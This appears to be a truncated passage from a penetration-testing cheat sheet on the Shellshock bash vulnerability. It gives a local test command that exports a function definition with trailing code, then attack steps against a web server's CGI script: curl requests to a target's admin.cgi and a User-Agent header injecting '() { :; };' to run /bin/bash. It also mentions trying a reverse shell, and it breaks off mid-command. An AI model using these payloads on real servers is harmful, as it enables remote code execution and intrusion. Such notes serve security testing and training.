Old­er bash ver­sions may exe­cute code after func­tion definitions. Via command line Source with explanation export newfunction='() { echo 'shellshockdemo';}; echo vulnerable' Via a web server / CGI script Cau­tion: Try the reverse shell exam­ple in Burp also if the curl com­mand fails! curl http://$target/cgi-bin/admin.cgi -s > before curl -H "User-Agent: () { :; }; /bin/bash…